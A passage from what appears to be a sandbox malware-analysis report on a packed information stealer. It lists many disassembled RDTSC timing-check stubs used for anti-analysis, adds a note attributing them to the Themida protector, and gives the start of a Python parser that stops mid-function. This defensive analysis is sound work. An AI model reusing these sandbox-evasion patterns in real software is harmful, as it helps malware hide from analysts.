    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C623A second address: 8C62D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4E5A4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F2CB4E5A4C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, 504600C8h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jc 00007F2CB4E5A4CAh 0x00000040 mov di, C786h 0x00000044 mov eax, dword ptr [ebp+122D0201h] 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007F2CB4E5A4C8h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 cld 0x00000065 mov edi, esi 0x00000067 push FFFFFFFFh 0x00000069 mov bx, 39B6h 0x0000006d mov bl, ah 0x0000006f push eax 0x00000070 pushad 0x00000071 jmp 00007F2CB4E5A4CFh 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C62D2 second address: 8C62D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9135 second address: 8C9139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9139 second address: 8C91AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2CB4F07466h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F2CB4F07458h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D38B5h] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 jnl 00007F2CB4F07458h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b mov ebx, 494DC231h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F2CB4F07467h 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7263 second address: 8C7267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3481 second address: 8C349E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA154 second address: 8CA158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA158 second address: 8CA1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F2CB4F07458h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 add dword ptr [ebp+122DB6A5h], edx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F2CB4F07458h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 adc bx, 8A81h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007F2CB4F07458h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007F2CB4F07461h 0x0000006e jmp 00007F2CB4F0745Bh 0x00000073 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA1E0 second address: 8CA203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jo 00007F2CB4E5A4C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C93B3 second address: 8C93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C93B9 second address: 8C93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F2CB4E5A4C6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2EE second address: 8CA2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2F8 second address: 8CA2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA2FC second address: 8CA313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CB4F0745Dh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873635 second address: 87363B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87363B second address: 873658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2CB4F07462h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873658 second address: 87365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87365C second address: 873660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2AB3 second address: 8D2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D2D second address: 8D7D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D37 second address: 8D7D8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e pop ebx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jns 00007F2CB4E5A4D9h 0x0000001a jmp 00007F2CB4E5A4D3h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F2CB4E5A4CEh 0x0000002a push eax 0x0000002b pop eax 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7D8E second address: 8D7DA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F2CB4F07456h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007F2CB4F07460h 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCE2F second address: 8DCE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCE33 second address: 8DCE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4F07456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCF94 second address: 8DCFC0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2CB4E5A4D4h 0x00000010 jng 00007F2CB4E5A4C6h 0x00000016 jc 00007F2CB4E5A4C6h 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCFC0 second address: 8DCFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2CB4F07456h 0x0000000a je 00007F2CB4F07456h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCFD0 second address: 8DCFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD14F second address: 8DD159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD403 second address: 8DD407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD93E second address: 8DD973 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CB4F07456h 0x00000008 jmp 00007F2CB4F07467h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4F07462h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD973 second address: 8DD979 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E06CF second address: 8E06D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8787 second address: 8E878B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E878B second address: 8E87A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07468h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8EFD second address: 8E8F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8F03 second address: 8E8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8F07 second address: 8E8F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2CB4E5A4D6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF28 second address: 8EDF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF30 second address: 8EDF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4D1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF4C second address: 8EDF65 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F2CB4F07456h 0x00000011 jbe 00007F2CB4F07456h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0B5 second address: 8EE0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CFh 0x00000009 jmp 00007F2CB4E5A4D8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0E5 second address: 8EE0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0EB second address: 8EE0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE381 second address: 8EE387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE387 second address: 8EE38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE503 second address: 8EE50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE50D second address: 8EE51E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE51E second address: 8EE528 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4F07456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDAF4 second address: 8EDAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4281 second address: 8F4285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4285 second address: 8F428B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F428B second address: 8F42AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2CB4F07469h 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8BAE second address: 8B8BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8BB4 second address: 8B8BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9087 second address: 8B908D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B908D second address: 8B9097 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CB4F0745Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9097 second address: 8B90A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B90A3 second address: 8B90AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91C1 second address: 8B91E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F2CB4E5A4C6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2CB4E5A4D4h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91E7 second address: 8B91ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91ED second address: 8B91F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9318 second address: 8B9321 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B93AE second address: 8B93B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994DE1 second address: 994DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2CB4E5A4C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999588 second address: 99958C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99958C second address: 999625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dh, ah 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2CB4E5A4C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edx, eax 0x00000028 call 00007F2CB4E5A4C9h 0x0000002d jmp 00007F2CB4E5A4D3h 0x00000032 push eax 0x00000033 pushad 0x00000034 jc 00007F2CB4E5A4CCh 0x0000003a jc 00007F2CB4E5A4C6h 0x00000040 jmp 00007F2CB4E5A4D2h 0x00000045 popad 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a jbe 00007F2CB4E5A4CAh 0x00000050 push ebx 0x00000051 push edx 0x00000052 pop edx 0x00000053 pop ebx 0x00000054 mov eax, dword ptr [eax] 0x00000056 pushad 0x00000057 jmp 00007F2CB4E5A4D2h 0x0000005c jl 00007F2CB4E5A4CCh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999625 second address: 999643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jc 00007F2CB4F0746Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4F0745Dh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99990A second address: 999949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2CB4E5A4C6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d jp 00007F2CB4E5A4D1h 0x00000013 push dword ptr [ebp+122D2167h] 0x00000019 push eax 0x0000001a mov edx, dword ptr [ebp+122D324Ch] 0x00000020 pop edx 0x00000021 call 00007F2CB4E5A4C9h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F2CB4E5A4C6h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999949 second address: 999953 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999953 second address: 999959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999959 second address: 99995D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99AD8A second address: 99AD9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F2CB4E5A4C6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B45 second address: 4A50B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B4B second address: 4A50B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e jmp 00007F2CB4E5A4D5h 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov cx, bx 0x0000001b mov esi, edx 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B79 second address: 4A50BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2D25EED628h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2CB4F0745Ah 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50BA1 second address: 4A50BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
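Each "RDTSC instruction interceptor" entry above spans from the rdtsc at "First address" to the next rdtsc the sandbox intercepted, so consecutive entries share a boundary read (96BC67, 96BC72, 96BC78, 96BC7C is one site read four times, not four checks). Nearly everything between the reads is balanced push/pop, pushad/popad and short forward jumps; together with the Oreans.vxd and Software\WinLicense strings found in the sample's memory later in this section, that pattern points at the Themida/WinLicense protector layer rather than the LummaC payload itself, so the number of rdtsc sites says little about the stealer. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses such lines, re-links the entries into chains, and reports per chain how many reads were taken, what fraction of the stub is stack junk, and which instructions do real work (the one at 4A50B4B loads and tests a field at [eax+860h]). The input lines are copied from the report; the chain-head rule and the junk classification are heuristics chosen for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: four interceptor entries copied from the report above (a
# three-link chain 9949E2..9949F8 and a lone site at 4A50B4B) plus one unrelated
# behaviour line that the parser must ignore.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\file.exe | RDTSC instruction interceptor: First address: 9949E2 second address: 9949E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe | RDTSC instruction interceptor: First address: 9949E8 second address: 9949EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe | RDTSC instruction interceptor: First address: 9949EC second address: 9949F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2CB4E5A4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe | RDTSC instruction interceptor: First address: 4A50B4B second address: 4A50B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e jmp 00007F2CB4E5A4D5h 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov cx, bx 0x0000001b mov esi, edx 0x0000001d popad 0x0000001e rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe | Special instruction interceptor: First address: 703A4A instructions caused by: Self-modifying code",
]

LINE_RE = re.compile(r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)\s+instructions:\s*(.*)$")
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")      # "0x00000002 " prefixes inside the stub
STACK_JUNK = {"push", "pop", "pushad", "popad", "nop"}  # protector filler between the reads
COND_JMP_RE = re.compile(r"^j(?!mp\b)[a-z]{1,3}$")      # jc, jnc, jng, jbe, ... but not jmp


@dataclass
class TimingSite:
    first: int
    second: int
    instructions: List[str]

    @property
    def mnemonics(self) -> List[str]:
        return [i.split()[0] for i in self.instructions]

    def junk_ratio(self) -> float:
        body = self.mnemonics[1:-1]  # drop the two bounding rdtsc
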